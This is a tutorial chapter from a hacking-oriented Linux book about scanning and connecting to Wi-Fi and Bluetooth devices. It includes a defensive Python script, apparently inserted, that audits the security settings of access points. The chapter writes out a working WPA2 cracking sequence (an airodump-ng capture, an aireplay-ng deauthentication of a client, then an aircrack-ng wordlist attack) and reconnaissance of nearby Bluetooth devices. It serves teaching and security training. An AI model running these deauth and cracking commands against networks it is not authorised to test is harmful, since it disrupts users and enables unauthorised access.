The ability to scan for and connect to other network devices from your system is crucial to becoming a successful hacker, and with wireless technologies like Wi-Fi (IEEE 802.11) and Bluetooth becoming the standard, finding and controlling Wi-Fi and Bluetooth connections is key. If someone can hack a wireless connection, they can gain entry to a device and access to confidential information. The first step, of course, is to learn how to find these devices.
In Chapter 3, we looked at some basic networking commands in Linux, including some of the fundamentals of wireless networking, with a promise of more wireless networking to come in Chapter 14. As promised, here we examine two of the most common wireless technologies in Linux: Wi-Fi and Bluetooth.
We’ll start with Wi-Fi. In this section, I’ll show you how to find, examine, and connect to Wi-Fi access points. Before doing so, let’s spend a bit of time going over some basic Wi-Fi terms and technologies to help you better understand the output from a lot of the queries we’ll make in this chapter:
AP (access point) This is the device wireless users connect to for internet access.
ESSID (extended service set identifier) This is the same as the SSID, which we discussed in Chapter 3, but it can be used for multiple APs in a wireless LAN.
BSSID (basic service set identifier) This is the unique identifier of each AP, and it is the same as the MAC address of the device.
SSID (service set identifier) This is the name of the network.
Channels Wi-Fi can operate on any one of 14 channels (1–14). In the United States, Wi-Fi is limited to channels 1–11.
Power The closer you are to the Wi-Fi AP, the greater the power, and the easier the connection is to crack.
Security This is the security protocol used on the Wi-Fi AP that is being read from. There are three primary security protocols for Wi-Fi. The original, Wired Equivalent Privacy (WEP), was badly flawed and easily cracked. Its replacement, Wi-Fi Protected Access (WPA), was a bit more secure. Finally, WPA2-PSK, which is much more secure and uses a preshared key (PSK) that all users share, is now used by nearly all Wi-Fi APs (except enterprise Wi-Fi).
Modes Wi-Fi can operate in one of three modes: managed, master, or monitor. You’ll learn what these modes mean in the following section.
Wireless range In the United States, a Wi-Fi AP must legally broadcast its signal at an upper limit of 0.5 watts. At this power, it has a normal range of about 300 feet (100 meters). High-gain antennas can extend this range to as much as 20 miles.
Frequency Wi-Fi is designed to operate on 2.4GHz and 5GHz. Modern Wi-Fi APs and wireless network cards often use both.
In Chapter 3, you were introduced to the basic Linux networking command ifconfig, which lists each activated network interface on your system along with some basic statistics, including (most importantly) the IP address of each interface. Let’s take another look at your results from running ifconfig and focus on the wireless connections this time.
kali >ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ba:82:0f
          inet addr:192.168.181.131  Bcast:192.168.181.255  Mask:255.255.255.0
--snip--
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
--snip--
➊ wlan0   Link encap:Ethernet  HWaddr 00:c0:ca:3f:ee:02
The Wi-Fi interface here is shown as wlan0 ➊. In Kali Linux, Wi-Fi interfaces are usually designated as wlanX, with X representing the number of that interface. In other words, the first Wi-Fi adapter on your system would be labeled wlan0, the second wlan1, and so on.
If you just want to see your Wi-Fi interfaces and their statistics, Linux has a specific command that’s similar to ifconfig but dedicated to wireless. That command is iwconfig. When you enter it, only your wireless interfaces and their key data are displayed:
kali >iwconfig
lo        no wireless extensions
wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point:Not-Associated  Tx-Power=20 dBm
          Retry short limit:7  RTS thr:off  Fragment thr:off
          Encryption key:off
          Power Management:off
eth0      no wireless extensions
Here, we see just the wireless interfaces, also known as network cards, and key data about them, including the wireless standard utilized, whether the ESSID is off, and the mode. The mode has three settings: managed, which means it is ready to join or has joined an AP; master, which means it is ready to act as or already is an AP; and monitor, which we’ll discuss a little later in the chapter. We can also see whether any client has associated with it and what its transmit power is, among other things. You can tell from this example that wlan0 is in the mode required to connect to a Wi-Fi network but is not connected to any yet. We will revisit this command again once the wireless interface is connected to a Wi-Fi network.
If you are not certain which Wi-Fi AP you want to connect to, you can see all the wireless access points your network card can reach using the iwlist command. The syntax for iwlist is as follows:
iwlist interface action
You can perform multiple actions with iwlist. For our purposes, we’ll use the scan action to see all the Wi-Fi APs in your area. (Note that with a standard antenna, your range will be 300–500 feet, but this can be extended with an inexpensive high-gain antenna.)
kali >iwlist wlan0 scan
wlan0     Scan completed:
          Cell 01 - Address:88:AD:43:75:B3:82
                    Channel:1
                    Frequency:2.412GHz (Channel 1)
                    Quality=70/70  Signal level=-38 dBm
                    Encryption key:off
                    ESSID:"Hackers-Arise"
--snip--
The output from this command should include all Wi-Fi APs within range of your wireless interface, along with key data about each AP, such as the MAC address of the AP, the channel and frequency it is operating on, its quality, its signal level, whether its encryption key is enabled, and its ESSID.
You will need the MAC address of the target AP (BSSID), the MAC address of a client (another wireless network card), and the channel the AP is operating on in order to perform any kind of hacking, so this is valuable information.
Another command that is very useful in managing your Wi-Fi connections is nmcli (or the network manager command line interface). The Linux daemon that provides a high-level interface for the network interfaces (including the wireless ones) is known as the network manager. Generally, Linux users are familiar with this daemon from its graphical user interface (GUI), but it can also be used from the command line.
The nmcli command can be used to view the Wi-Fi APs near you and their key data, as we did with iwlist, but this command gives us a little more information. We use it in the format nmcli dev networktype, where dev is short for devices and the type (in this case) is wifi, like so:
kali >nmcli dev wifi
* SSID MODE CHAN RATE SIGNAL BARS SECURITY
Hackers-Arise Infra 1 54 Mbits/s 100 WPA1 WPA2
Xfinitywifi Infra 1 54 Mbits/s 75 WPA2
TPTV1 Infra 11 54 Mbits/s 44 WPA1 WPA2
--snip--
In addition to displaying the Wi-Fi APs within range and key data about them, including the SSID, the mode, the channel, the rate of transfer, the signal strength, and the security protocols enabled on the device, nmcli can be used to connect to APs. The syntax to connect to an AP is as follows:
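The SECURITY column is the first thing worth checking before you join a network you manage. The script below is an added example (not from the book or from NetworkManager): it parses the terse form of the same scan (nmcli -t -f BSSID,SSID,CHAN,SIGNAL,SECURITY dev wifi, where terse mode escapes the colons inside the BSSID as "\:"), rates each AP's security setting, and flags SSIDs whose APs disagree with each other. The sample output is constructed, not captured.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on:
#   nmcli -t -f BSSID,SSID,CHAN,SIGNAL,SECURITY dev wifi
# Terse mode separates fields with ':' and escapes colons inside values as '\:';
# an empty SECURITY field means an open network.
SAMPLE = r"""88\:AD\:43\:75\:B3\:82:Hackers-Arise:1:100:WPA1 WPA2
00\:25\:9C\:97\:4F\:48:Hackers-Arise:9:64:WPA2
1A\:2B\:3C\:4D\:5E\:6F:Xfinitywifi:1:75:
C0\:FF\:EE\:C0\:FF\:EE:TPTV1:11:44:WEP
"""

FIELDS = ("bssid", "ssid", "chan", "signal", "security")


def parse_terse(text):
    """Split nmcli -t output on unescaped colons only, then unescape the values."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = [p.replace(r"\:", ":") for p in re.split(r"(?<!\\):", line)]
        if len(parts) != len(FIELDS):
            raise ValueError(f"unexpected field count in line: {line!r}")
        row = dict(zip(FIELDS, parts))
        row["chan"] = int(row["chan"])
        row["signal"] = int(row["signal"])
        rows.append(row)
    return rows


def rate_security(security):
    """Map the SECURITY column to a coarse risk label."""
    protos = set(security.split())
    if not protos:
        return "open"
    if "WEP" in protos:
        return "wep"
    if "WPA1" in protos and not protos & {"WPA2", "WPA3"}:
        return "wpa1-only"
    if "WPA1" in protos:
        return "mixed-mode"  # WPA2 present, but the older WPA1/TKIP fallback is still offered
    return "ok"


def audit(rows):
    """Return findings per SSID: weak settings and APs of one SSID that disagree."""
    findings = defaultdict(list)
    by_ssid = defaultdict(list)
    for row in rows:
        by_ssid[row["ssid"]].append(row)
        label = rate_security(row["security"])
        if label != "ok":
            findings[row["ssid"]].append(f"{row['bssid']} ch{row['chan']}: {label}")
    for ssid, aps in by_ssid.items():
        if len({ap["security"] for ap in aps}) > 1:
            findings[ssid].append("APs advertise different security settings")
    return dict(findings)


if __name__ == "__main__":
    for ssid, notes in audit(parse_terse(SAMPLE)).items():
        print(ssid)
        for note in notes:
            print("   ", note)
```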
nmcli dev wifi connect AP-SSID password APpassword
So, based on the results from our first command, we know there is an AP with an SSID of Hackers-Arise. We also know it has WPA1 WPA2 security (this means that the AP is capable of using both the older WPA1 and the newer WPA2), which means we will have to provide the password to connect to the network. Fortunately, as it’s our AP, we know the password is 12345678, so we can enter the following:
kali >nmcli dev wifi connect Hackers-Arise password 12345678
Device 'wlan0' successfully activated with '394a5bf4-8af4-36f8-49beda6cb530'.
Try this on a network you know, and then when you have successfully connected to that wireless AP, run iwconfig again to see what has changed. Here’s my output from connecting to Hackers-Arise:
kali >iwconfig
lo        no wireless extensions
wlan0     IEEE 802.11bg  ESSID:"Hackers-Arise"
          Mode:Managed  Frequency:2.452GHz  Access Point:00:25:9C:97:4F:48
          Bit Rate=12 Mbs  Tx-Power=20 dBm
          Retry short limit:7  RTS thr:off  Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=64/70  Signal level=-46 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:13  Missed beacon:0
eth0      no wireless extensions
Note that now iwconfig has indicated that the ESSID is "Hackers-Arise" and that the AP is operating at a frequency of 2.452GHz. In a Wi-Fi network, it is possible for multiple APs to all be part of the same network, so there may be many APs that make up the Hackers-Arise network. The MAC address 00:25:9C:97:4F:48 is, as you might expect, the MAC of the AP I am connected to. What type of security a Wi-Fi network uses, whether it is running at 2.4GHz or 5GHz, what its ESSID is, and what the AP’s MAC address is are all critical pieces of information that are necessary for Wi-Fi hacking. Now that you know the basic commands, let’s get into some hacking.
One of the most popular exploits for new hackers to try is cracking Wi-Fi access points. As mentioned, before you can even consider attacking a Wi-Fi AP, you need the MAC address of the target AP (BSSID), the MAC address of a client, and the channel the AP is operating on.
We can get all that information and more using the tools of the aircrack-ng suite. I’ve mentioned this suite of Wi-Fi hacking tools a few times before, and now it’s time to actually use it. This suite of tools is included in every version of Kali, so you don’t need to download or install anything.
To use these tools effectively, you first need to put your wireless network card into monitor mode so that the card can see all the traffic passing its way. Normally, a network card captures only traffic destined specifically for that card. Monitor mode is similar to promiscuous mode on wired network cards.
To put your wireless network card in monitor mode, use the airmon-ng command from the aircrack-ng suite. The syntax for this command is simple:
airmon-ng start|stop|restart interface
So, if you want to put your wireless network card (designated wlan0) into monitor mode, you would enter the following:
kali >airmon-ng start wlan0
Found three processes that could cause trouble
If airodump-ng, aireplay-ng, or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
--snip--
PHY     INTERFACE    DRIVER     Chipset
phy0    wlan0        rtl8187    Realtek Semiconductor Corp RTL8187
        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
--snip--
The stop and restart commands, respectively, stop monitor mode and restart monitor mode if you run into trouble.
With your wireless card in monitor mode, you can access all the wireless traffic passing by you within the range of your wireless network adapter and antenna (standard is about 300–500 feet). Note that airmon-ng will rename your wireless interface: mine has been renamed “wlan0mon,” though yours may be different. Make certain to note the new name of your wireless interface, because you’ll need it in the next step.
Now we’ll use another tool from the aircrack-ng suite to find key data from the wireless traffic. The airodump-ng command captures and displays the key data from broadcasting APs and any clients connected to those APs or within the vicinity. The syntax here is straightforward: simply enter airodump-ng, followed by the interface name you got from running airmon-ng just now. When you issue this command, your wireless card will pick up crucial information (listed next) from all the wireless traffic of the APs nearby:
BSSID The MAC address of the AP or client
PWR The strength of the signal
ENC The encryption used to secure the transmission
#Data The data throughput rate
CH The channel the AP is operating on
ESSID The name of the AP
kali >airodump-ng wlan0mon
CH 9 ][ Elapsed: 28 s ][ 2018-02-08 10:27
BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
01:01:AA:BB:CC:22   -1        4     26    0  10  54e  WPA2  CCMP    PSK   Hackers-Arise
--snip--
BSSID              Station            PWR  Rate  Lost  Frames  Probe
(not associated)   01:01:AA:BB:CC:22
01:02:CC:DD:03:CF  A0:A3:E2:44:7C:E5
Note that airodump-ng splits the output screen into an upper and lower portion. The upper portion has information on the broadcasting APs, including the BSSID, the power of the AP, how many beacon frames have been detected, the data throughput rate, how many packets have traversed the wireless card, the channel (1–14), the theoretical throughput limit, the encryption protocol, the cipher used for encryption, the authentication type, and the ESSID (commonly referred to as SSID). In the client portion, the output tells us that one client is not associated, meaning it has been detected but is not connected to any AP, and that another is associated with a station, meaning it’s connected to the AP at that address.
Now you have all the information you need to crack the AP! Although it’s beyond the scope of this book, to crack the wireless AP, you need the client MAC address, the AP MAC address, the channel the target is operating on, and a password list.
So to crack the Wi-Fi password, you would open three terminals. In the first terminal, you would enter commands similar to the following, filling in the client and AP MAC addresses and the channel:
airodump-ng -c 10 --bssid 01:01:AA:BB:CC:22 -w Hackers-ArisePSK wlan0mon
This command captures all the packets traversing the AP on channel 10 using the -c option.
In another terminal, you can use the aireplay-ng command to knock off (deauthenticate) anyone connected to the AP and force them to reauthenticate to the AP, as shown next. When they reauthenticate, you can capture the hash of their password that is exchanged in the WPA2-PSK four-way handshake. The password hash will appear in the upper-right corner of the airodump-ng terminal.
aireplay-ng --deauth 100 -a 01:01:AA:BB:CC:22 -c A0:A3:E2:44:7C:E5 wlan0mon
Finally, in the final terminal, you can use a password list (wordlist.dic) to find the password in the captured hash (Hackers-ArisePSK.cap), as shown here:
aircrack-ng -w wordlist.dic -b 01:01:AA:BB:CC:22 Hackers-ArisePSK.cap
These days, nearly every gadget, mobile device, and system has Bluetooth built in, including our computers, smartphones, iPods, tablets, speakers, game controllers, keyboards, and many other devices. Being able to hack Bluetooth can lead to the compromise of any information on the device, control of the device, and the ability to send unwanted info to and from the device, among other things.
To exploit the technology, we need to understand how it works. An in-depth understanding of Bluetooth is beyond the scope of this book, but I will give you some basic knowledge that will help you scan for and connect to Bluetooth devices in preparation for hacking them.
Bluetooth is a universal protocol for low-power, near-field communication operating at 2.4–2.485GHz using spread spectrum, frequency hopping at 1,600 hops per second (this frequency hopping is a security measure). It was developed in 1994 by Ericsson Corp. of Sweden and named after the 10th-century Danish king Harald Bluetooth (note that Sweden and Denmark were a single country in the 10th century).
The Bluetooth specification has a minimum range of 10 meters, but there is no limit to the upper range manufacturers may implement in their devices. Many devices have ranges as large as 100 meters. With special antennas, that range can be extended even farther.
Connecting two Bluetooth devices is referred to as pairing. Pretty much any two Bluetooth devices can connect to each other, but they can pair only if they are in discoverable mode. A Bluetooth device in discoverable mode transmits the following information:
When the two devices pair, they exchange a secret or link key. Each stores this link key so it can identify the other in future pairings.
Every device has a unique 48-bit identifier (a MAC-like address) and usually a manufacturer-assigned name. These will be useful pieces of data when we want to identify and access a device.
Linux has an implementation of the Bluetooth protocol stack called BlueZ that we’ll use to scan for Bluetooth signals. Most Linux distributions, including Kali Linux, have it installed by default. If yours doesn’t, you can usually find it in your repository using the following command:
kali >apt-get install bluez
BlueZ has a number of simple tools we can use to manage and scan Bluetooth devices, including the following:
hciconfig This tool operates very similarly to ifconfig in Linux, but for Bluetooth devices. As you can see in Listing 14-1, I have used it to bring up the Bluetooth interface and query the device for its specs.
hcitool This inquiry tool can provide us with device name, device ID, device class, and device clock information, which enables the devices to work synchronously.
hcidump This tool enables us to sniff the Bluetooth communication, meaning we can capture data sent over the Bluetooth signal.
The first scanning and reconnaissance step with Bluetooth is to check whether the Bluetooth adapter on the system we’re using is recognized and enabled so we can use it to scan for other devices. We can do this with the built-in BlueZ tool hciconfig, as shown in Listing 14-1.
kali >hciconfig
hci0: Type: BR/EDR Bus: USB
BD Address: 10:AE:60:58:F1:37 ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING PSCAN INQUIRY
RX bytes:131433 acl:45 sco:0 events:10519 errors:0
TX bytes:42881 acl:45 sco:0 commands:5081 errors:0
Listing 14-1: Scanning for a Bluetooth device
As you can see, my Bluetooth adapter is recognized with a MAC address of 10:AE:60:58:F1:37. This adapter has been named hci0. The next step is to check that the connection is enabled, which we can also do with hciconfig by providing the name and the up command:
kali >hciconfig hci0 up
If the command runs successfully, we should see no output, just a new prompt.
Good, hci0 is up and ready! Let’s put it to work.
Now that we know our adapter is up, we can use another tool in the BlueZ suite called hcitool, which is used to scan for other Bluetooth devices within range.
Let’s first use the scanning function of this tool to look for Bluetooth devices that are sending out their discover beacons, meaning they’re in discovery mode, with the simple scan command shown in Listing 14-2.
kali >hcitool scan
Scanning...
72:6E:46:65:72:66 ANDROID BT
22:C5:96:08:5D:32 SCH-I535
Listing 14-2: Scanning for Bluetooth devices in discovery mode
As you can see, on my system, hcitool found two devices, ANDROID BT and SCH-I535. Yours will likely provide you with different output depending on what devices you have around. For testing purposes, try putting your phone or other Bluetooth device in discovery mode and see if it gets picked up in the scan.
Now let’s gather more information about the detected devices with the inquiry function inq:
kali >hcitool inq
Inquiring...
24:C6:96:08:5D:33 clock offset:0x4e8b class:0x5a020c
76:6F:46:65:72:67 clock offset:0x21c0 class:0x5a020c
This gives us the MAC addresses of the devices, the clock offset, and the class of the devices. The class indicates what type of Bluetooth device you found, and you can look up the code and see what type of device it is by going to the Bluetooth SIG site at https://www.bluetooth.org/en-us/specification/assigned-numbers/service-discovery/.
The tool hcitool is a powerful command line interface to the Bluetooth stack that can do many, many things. Listing 14-3 shows the help page with some of the commands you can use. Take a look at the help page yourself to see the full list.
kali >hcitool --help
hcitool - HCI Tool ver 4.99
Usage:
hcitool [options] <command> [command parameters]
Options:
--help Display help
-i dev HCI device
Commands
dev Display local devices
inq Inquire remote devices
scan Scan for remote devices
name Get name from remote devices
--snip--
Listing 14-3: Some hcitool commands
Many Bluetooth-hacking tools you’ll see around simply use these commands in a script, and you can easily create your own tool by using these commands in your own bash or Python script—we’ll look at scripting in Chapter 17.
Service Discovery Protocol (SDP) is a Bluetooth protocol for searching for Bluetooth services (Bluetooth is a suite of services), and, helpfully, BlueZ provides the sdptool tool for browsing a device for the services it provides. It is also important to note that the device does not have to be in discovery mode to be scanned. The syntax is as follows:
sdptool browse MACaddress
Listing 14-4 shows me using sdptool to search for services on one of the devices detected earlier in Listing 14-2.
kali >sdptool browse 76:6E:46:63:72:66
Browsing 76:6E:46:63:72:66...
Service RecHandle: 0x10002
Service Class ID List:
  ""(0x1800)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 31
  "ATT" (0x0007)
    uint16: 0x1
    uint16: 0x5
--snip--
Listing 14-4: Scanning with sdptool
Here, we can see that the sdptool tool was able to pull information on all the services this device is capable of using. In particular, we see that this device supports the ATT Protocol, which is the Low Energy Attribute Protocol. This can provide us more clues as to what the device is and possibly potential avenues to interact with it further.
Once we’ve gathered the MAC addresses of all nearby devices, we can send out pings to these devices, whether they’re in discovery mode or not, to see whether they are in reach. This lets us know whether they are active and within range. To send out a ping, we use the l2ping command with the following syntax:
l2ping MACaddress
Listing 14-5 shows me pinging the Android device discovered in Listing 14-2.
kali >l2ping 76:6E:46:63:72:66 -c 4
Ping: 76:6E:46:63:72:66 from 10:AE:60:58:F1:37 (data size 44)...
44 bytes 76:6E:46:63:72:66 id 0 time 37.57ms
44 bytes 76:6E:46:63:72:66 id 1 time 27.23ms
44 bytes 76:6E:46:63:72:66 id 2 time 27.59ms
--snip--
Listing 14-5: Pinging a Bluetooth device
This output indicates that the device with the MAC address 76:6E:46:63:72:66 is within range and reachable. This is useful knowledge, because we must know whether a device is reachable before we even contemplate hacking it.
Wireless devices represent the future of connectivity and hacking. Linux has developed specialized commands for scanning and connecting to Wi-Fi APs in the first step toward hacking those systems. The aircrack-ng suite of wireless hacking tools includes both airmon-ng and airodump-ng, which enable us to scan and gather key information from in-range wireless devices. The BlueZ suite includes hciconfig, hcitool, and other tools capable of scanning and information gathering, which are necessary for hacking the Bluetooth devices within range. It also includes many other tools worth exploring.